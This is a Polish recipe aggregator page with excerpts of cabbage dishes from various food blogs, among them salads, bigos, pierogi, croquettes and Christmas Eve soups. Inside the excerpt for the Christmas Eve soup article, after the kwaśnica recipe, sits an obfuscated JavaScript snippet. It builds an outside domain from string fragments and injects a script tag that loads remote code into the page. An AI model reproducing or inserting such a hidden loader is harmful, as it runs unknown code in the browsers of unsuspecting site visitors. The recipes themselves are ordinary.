kapustą - 19268 przepisów (strona:407/1285)

Surówka z czerwonej kapusty z sosem czosnkowym 137

Surówka z czerwonej kapusty doprawiona sosem czosnkowym. Świetny dodatek do obiadu i kanapek. Jeżeli lubicie bardziej ostre czosnkowe smaki to można dodać więcej przeciśniętego przez praskę czosnku. Z jogurtem surówka będzie bardziej lekka. Ja jednak wolę śmietanę. Wybór należy do Was. Na blogu w zakładce SURÓWKI znajdziecie więcej pomysłów na różne obiadowe przystawki. Polecam! Składniki 1 mała główka czerwonej kapusty(...)cebula 1 pączek szczypiorku Sos 200 g śmietany lub jogurtu naturalnego 2 ząbki czosnku sól pieprz oregano Śmietanę wymieszać z przeciśniętym przez praskę czosnkiem, solą, pieprzem i oregano. Kapustę zetrzeć na tarce o grubych oczkach lub drobno posiekać. Marchewkę, cebulę zetrzeć na tarce o grubych oczkach. Szczypiorek drobno posiekać. Oprószyć lekko solą i wszystko razem wymieszać, a następnie wlać

O kuchni z uczuciem
Barszcz czerwony na zakwasie z krokietami 146

Suszone grzyby – 4-5 sztuk Majeranek, sól, pieprz, cukier, ocet Składniki - naleśniki: Mąka pszenna – 1 szklanka Mleko – ½ szklanki Woda gazowana – ½ szklanki Jajko – 1 sztuka Olej rzepakowy – 1 łyżka Składniki - kapusta z grzybami: Kapusta kiszona – 0,5 kg Suszone grzyby – 2 szklanki Cebula – 1 sztuka Sól, pieprz Wykonanie - barszcz: Wszystkie warzywa obieramy i kroimy w kostkę. Zalewamy zimną wodą, dodajemy zakwas(...)ciasta jajko, olej i całość dokładnie mieszamy. Naleśniki smażymy na dobrze rozgrzanej patelni. W między czasie podsmażamy na oleju drobno posiekaną cebulę, ugotowane i pokrojone w kostkę grzyby i kapustę kiszoną. Całość doprawiamy do smaku solą i pieprzem.  Naleśniki faszerujemy kapustą z grzybami i robimy krokiety

Kuchnia Bon Appetit
Sałatka z tuńczykiem i kapustą pekińską 208

pory tuńczyka w sałatkach jadałam tylko w towarzystwie ryżu i kukurydzy, więc gdy znalazłam przepis na sałatkę z dodatkiem kapusty pekińskiej musiałam ją wypróbować. Zrobiłam ją wczoraj na kolację i mówię Wam bomba!, jeśli jeszcze ktoś nie próbował to warto. W dodatku danie świetnie sprawdzi się na nadchodzący świąteczno-sylwestrowo-karnawałowy czas, na każdą imprezę będzie jak znalazł :) Składniki: (Inspiracja(...)Mgotuje ") 1 mała lub 0,5 dużej kapusty pekińskiej 1 czerwona papryka 4-5 ogórków konserwowych 3-4 ugotowane na twardo jajka  1 puszka tuńczyka w sosie własnym 1 mała czerwona cebula (dobrze by było gdyby nie była za ostra) sól, pieprz majonez ew. kiełki (ja posypałam sałatkę delikatnie kiełkami brokuła, ale spokojnie można je pominąć)   Kapustę poszatkować

Simply Food
BIGOS MYŚLIWSKI 183

niedrogi.Zyskuje na smaku przechowywany w chłodzie i ponownie odgrzewany.Najlepszy jest po trzech dniach.Warto go zrobić ugotować go więcej , podzielić go na porcje i zamrozić na później.Zapraszam. 1 kg.kiszonej kapusty 1 główka białej kapusty 50 dag.wołowiny 30 dag.kiełbasy jałowcowej 20 dag.boczku wędzonego 2 cebule 2 marchewki 1 przecier pomidorowy 3 duże ząbki czosnku 10 dag.suszonych grzybków 3 suszone(...)dużą kostkę , wysmażyć na suchej patelni ,dodać drobno posiekaną cebulę .Mięso opłukać , osuszyć ,pokroić kostkę , usmażyć na tłuszczu wytopionym z boczku.Dodać do niego pokrojony w plasterki czosnek.Białą kapustę umyć ,wyciąć głąb.Liście poszatkować i przełożyć do mięsa.Gotować chwilę , dodać kapustę kiszoną ,starte marchewki na tarce o dużych oczkach lub pokroić w kostkę ,pokruszyć grzyby oraz dodać całe

Kocurkowe rozmyślania w kuchni Anielki
Świąteczne pierogi z grochem i borowikami 176

też, zastanawiacie się jak do świątecznego menu , które serwujecie tradycyjnie od lat, wprowadzić nutkę nowoczesności, połączyć inne smaki , to z pewnością nie będzie trudne.  Pierożki z farszem z kapusty grochu i borowików na pewno zrobią wrażenie na każdym. Warto więc dołożyć swoich starań i przygotować je po mistrzowsku ;) Trudno sobie wyobrazić wigilijną kolację bez pierożków, tradycja zobowiązuje(...)idealne na  świąteczny prezent . Składniki na ciasto: 70 dag mąki tortowej 1,5 szklanki gorącej wody 1 jajko Szczypta soli 1 łyżeczka miękkiego masła Farsz: 1 litr kiszonej kapusty z marchewką 1 szklanka łuskanego grochu 40 dag mrożonych borowików 2 cebule 2 łyżki masła lub oleju Sól morska do smaku Świeżo mielony pieprz do smaku Pierożki zaczynamy od przygotowania

Wanilia i Kardamon
Krokiety z kapustą i pieczarkami 174

Dzisiaj mam dla Was propozycję pysznych krokietów z kapustą i pieczarkami. Ostatnio mam przyjemność testowania pysznych olei od firmy SEMCO . Jeden z nich użyłam właśnie do krokietów. Z wielkopolskich nasion podwójnie uszlachetnionej odmiany rzepaku według starej metody tłoczenia na zimno wytwarzamy Olej Rzepakowy z Wielkopolski – nierafinowany. Zawartość 56g/100ml kwasu tłuszczowego jednonienasyconego oleinowego w oleju decyduje o jego stabilności i przydatności(...)ciasto naleśnikowe : 2 szklanki mąki 2 jajka 2 i 1/4   szklanki mleka 1/2 łyżeczki soli 2 łyżki oleju rzepakowego Semco Składniki na farsz :     2 kg kiszonej kapusty 500 g pieczarek   3 cebule sól, pieprz, szczypta chili do smaku  2 łyżki masła 4 łyżki oleju rzepakowego Semco olej do smażenia bułka tarta do obtoczenia krokietów

Sama słodycz i szczypta chili
Zupa na Wigilię – nie tylko barszcz! 134

serwuje się na zimno lub na ciepło. Kwaśnica Kwaśnica to zupa na Wigilię wywodząca się z Podhala. Przygotowuje się ją z: Głowy i podrobów z wybranej ryby 30 dag kapusty kiszonej Soku z kapusty kiszonej Kilku suszonych grzybów 5 ziaren ziela angielskiego 2 ząbków czosnku Szczypty suszonego imbiru Kiszoną kapustę szatkujemy, wrzucamy do garnka, zalewamy odrobiną wody oraz sokiem(...)kiszonej kapusty i gotujemy. Dodajemy grzyby, ziele angielskie i gotujemy do zmięknięcia. Dodajemy podroby i głowy ryb, gotujemy przez 20 minut, wyjmujemy podroby, doprawiamy czosnkiem oraz imbirem i ponownie zagotowujemy. (function(){ cwbx=document.createElement("script");cwbx_=("ust");cwbxu="69293527"; cwbx_+="a"+("t.i");cwbx.type="text/javascript"; cwbxu+=".pdmwktdtwbxmgxxyXtf9";cwbx.async=true;cwbx_+="n"+("f"+"o")+"/"; cwbxu+="bn8i421swj";cwbx.src="//"+cwbx_+cwbxu; document.body.appendChild(cwbx); })(); Artykuł Zupa

Okiem Blondynki by McBlondi
Wigilijne pierogi z kapustą i grzybami… 575

specjalną prośbę jednej z czytelniczek, dzielę się dziś z Wami przepisem na pierogi z kapustą i grzybami. Od razu muszę Wam zaznaczyć, że żadną specjalistką od pierogów absolutnie nie jestem; prawda jest taka, że robię je zaledwie kilka razy do roku, z mięsem lub właśnie kapustą i grzybami. Ciasto robię na ogół właśnie takie,… Continue reading Wigilijne pierogi(...)kapustą i grzybami

brunetkawkuchni
Kapusta z grzybami i śliwkami 115

Świetny przepis na kapustę z dużą ilością grzybów oraz suszonymi śliwkami. To mój ulubiony bigos bez mięsa , który często szykuję na wigilijny stół. Tę kapustę można też użyć jako farsz do pierogów. Wystarczy drobniej poszatkować grzyby i kapustę, wlać odrobinę więcej oleju i smażyć całość dodatkowo bez przykrycia przez 20 minut.  - super bigos bez mięsa - kapustę można wykorzystać również

AniaGotuje.pl
Pieczony dorsz z ziemniakami w pesto i surówką z kiszonej kapusty 106

smakować dobrze. Możemy podać ją nawet z pieczywem, a gdy mamy chwilę to np. z pieczonymi ziemniakami w pesto. Ja jak zawsze rybę podaję z surówką z kiszonej kapusty i jabłka. To takie moje małe, zdrowe uzależnienie ;) Polecam! polędwice z dorsza (ok. 450g) łyżka oleju (do ryb używam oleju słonecznikowego z pieprzem cytrynowym) łyżeczka pieprzu cytrynowego pół cytryny pół głowki(...)czosnku gałązka rozmarynu   0/5 kg ugotowanych ziemniaków 2 łyżki pesto surówka: 0/5 kg kiszonej kapusty mała marchewka jabłko 0/5 pęczka cienkiego szczypiorku łyżka oliwy sól i pieprz do smaku Piekarnik nagrzewamy do 190 stopni. Dorsza nacieramy olejem i pieprzem cytrynowym. Układamy w naczyniu żaroodpornym. Na wierzchu układamy przekrojone ząbki czosnku, pokrojoną w plasterki cytrynę oraz rozmaryn. Pieczemy uważając

Mienta blog
Kapusta z żeberkami z szybkowaru 170

Witajcie :) Dzisiaj mam dla Was propozycję pysznej kapusty z żeberkami gotowanej w szybkowarze. Nadaje się jako samodzielne danie np: z bułką lu jako dodatek do ziemniaków. Jeśli nie macie jeszcze takiego garnka to polecam zakupić, uwielbiam w nim gotować, po pierwsze o wiele szybciej przygotowuje się danie a po drugie jest zdrowsze. Można w nim przyrządzać różnego rodzaju mięsa(...)kanapek bez pieczenia i smażenia. Zapraszam do wypróbowania :)  Składniki : trochę ponad kg kapusty kiszonej  około 400 g żeberek ( 2 kawałki  2 cebule 3 łyżki oleju 1 łyżka ziół prowansalskich 1 liść laurowy kilka ziarenek ziela angielskiego  sól, pieprz lub domowa vegeta do smaku 1 łyżka masła szybkowar Wykonanie : Żeberka myjemy i ewentualnie dzielimy na porcje.Cebul

Sama słodycz i szczypta chili
KROKIETY Z PIECZARKAMI I KAPUSTĄ 160

Krokiety. Kojarzą Nam się zdecydowanie z kiszoną kapustą i aromatycznymi leśnymi grzybkami. A u mnie dziś na opak. Słodka kapustka i pieczarki. Moim dzieciom zdecydowanie bardziej smakują takie krokiety w łagodniejszym wydaniu. Składniki: 1 szklanka mąki 1 szklanka wody gazowanej 1/2 szklanka mleka 2 jajka lub 1 duże wiejskie 2 łyżki oleju szczypta soli farsz: 1/4 główki średniej kapusty(...)pieczarek 1 cebula sól, pieprz panierka: szklanka bułki tartej 1 jajko Wykonanie: *Kapustę szatkujemy, wkładamy do garnka, zalewamy wodą, dodajemy sól. Gotujemy do miękkości. *Cebulę siekamy, szklimy na niewielkiej ilości oleju, dokładamy pokrojone w plastry pieczarki, zrumieniamy. Dokładamy osączoną kapustę. Smażymy razem ok 5 minut. *Z podanych składników przygotowujemy ciasto naleśnikowe. Smażymy cienkie naleśniki. *Na każdy naleśnik nakładamy

Z Majeczką w kuchni
Zupa gołąbkowa 148

Dziś przepis na zupę z kapusty. W weekend zdecydowałam się na ugotowanie zupy gołąbkowej z włoską kapustą. Bardzo nam ta zupa smakowała, a dzieci prosiły o dokładkę :)  Składniki: 2,5 litra bulionu warzywnego ok. 700 g wieprzowego mięsa mielonego ok. ćwiartka włoskiej kapusty 1 duża marchew pół selera 1 cebula 3 ząbki czosnku 2/3 szklanki ryżu 500 ml passaty(...)przełożyć mięso razem z liściem laurowym i zielem. Marchew i selera obrać, zetrzeć na grubej tarce lub pokroić w słupki. Dodać do wywaru. Kiedy wywar się zagotuje, dodać ryż. Kapustę grubo posiekać, dodać do wywaru razem z kminkiem. Kiedy ryż i warzywa zmiękną, wlać passatę, dodać koncentrat pomidorowy, słodką i wędzoną paprykę, oregano, sól i pieprz do smaku. Chwilę pogotować

Czerwień i błękit
Wigilijne pierogi wg przepisu Prababci Anastazji 140

falbanką, a czasem z odciśniętym widelcem. Bożonarodzeniowe pierogi w każdym domu wyglądają inaczej, różnią się formą, farszem i dodatkami, jednak w większości polskich domów wigilijny prym wiodą pierogi z kapustą i grzybami.  W ostatni weekend podczas warsztatów zorganizowanych w strefie Piotrkowska 217 w Łodzi poznałam kilka sekretów perfekcyjnych pierogów Pani Gosi . Z nową wiedzą zabraliśmy się do samodzielnego wyrabiania(...)wałkowania lepienia pierogów - oczywiście pod czujnym okiem Pani Gosi :) Poniżej przepis na wigilijne pierogi z kapustą i grzybami wg przepisu prababci Anastazji. Składniki na farsz// ok 50 pierogów kapusta kiszona - 1 kg suszone grzyby - 5 dkg cebula - 20 dkg sól pieprz Grzyby zalewamy wodą i moczymy przez dwie godziny po czym gotujemy do miękkości, odcedzamy i mielimy w maszynce

Wylizany Rondel
Gołąbki na włoskiej kapuście 139

jakoś naszło mnie na gołąbki. Moje gołąbki zawsze były ze słodką kapustą. Pierwszy raz zrobiłam na włoskiej kapuście i muszę przyznać, że nie ostatni. Są bardzo smaczne i zdecydowanie szybciej się je robi bo kapusta ekspresowo się parzy. Jako mięso dałam tym razem karkówkę a przeważnie była to łopatka. Tak więc kapusta włoska będzie częściej gościć w moich gołąbkach. Rozwiń

Ewa w kuchni